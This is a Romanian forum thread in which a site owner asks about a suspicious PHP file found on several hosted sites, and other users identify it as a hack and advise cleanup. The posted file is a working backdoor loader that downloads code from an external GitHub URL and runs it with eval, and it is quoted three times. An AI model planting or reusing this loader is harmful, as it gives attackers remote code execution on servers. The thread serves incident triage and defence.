Fisier ciudat in ftp

AsyMax · 18 Feb 2019

Salut,
Astazi am aruncat o privire prin fts la cateva site-uri de pe acelasi dedicat si am observat ca in toate se afta un fisier 8829548_5.php.
Stie cineva daca e ceva de rau sau cum naiba a aparut peste tot, doar in public_html la fiecare site..

Multumesc frumos.

cod:

Cod:

<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://raw.githubusercontent.com/wahyu1/japext/master/idb.txt');
eval('?>'.$a);

Naruto9 · 18 Feb 2019

AsyMax a spus:
Salut,
Astazi am aruncat o privire prin fts la cateva site-uri de pe acelasi dedicat si am observat ca in toate se afta un fisier 8829548_5.php.
Stie cineva daca e ceva de rau sau cum naiba a aparut peste tot, doar in public_html la fiecare site..

Multumesc frumos.

cod:

Cod:

<?php function get_contents($url){ $ch = curl_init("$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); $result = curl_exec($ch); return $result; } $a = get_contents('https://raw.githubusercontent.com/wahyu1/japext/master/idb.txt'); eval('?>'.$a);

hack pe server..curata serverul si scapa de vulnerabilitati...teme, pluginuri etc

Cyry · 18 Feb 2019

AsyMax a spus:
Salut,
Astazi am aruncat o privire prin fts la cateva site-uri de pe acelasi dedicat si am observat ca in toate se afta un fisier 8829548_5.php.
Stie cineva daca e ceva de rau sau cum naiba a aparut peste tot, doar in public_html la fiecare site..

Multumesc frumos.

cod:

Cod:

<?php function get_contents($url){ $ch = curl_init("$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); $result = curl_exec($ch); return $result; } $a = get_contents('https://raw.githubusercontent.com/wahyu1/japext/master/idb.txt'); eval('?>'.$a);

Daca accesezi : https://raw.githubusercontent.com/wahyu1/japext/master/idb.txt
Vei vedea ca : root@indoxploit , [pwd]".getcwd ... adica a intrat "necuratul" pe server ...

De unde ai server ?

AlexH · 18 Feb 2019

Unde e serverul prea putin conteaza, ce conteaza e ce are pe el. La fel poate fi un shared hosting.
Prince ceva de pe hostul lui a reusit sa aiba acces.
Acum sterge tot ce este suspect, schimbat parola peste tot si update la zi pentru orice thema, plugin, reinstall la wp din admin panel.

Fisier ciudat in ftp

AsyMax

Sales and Marketing

Naruto9

VIP Club

Cyry

VIP Club

AlexH

Merg pe strada catre Mine...

Reclama

Reclama

Stiri Monezi Virtuale

Reducere pentru Vacanta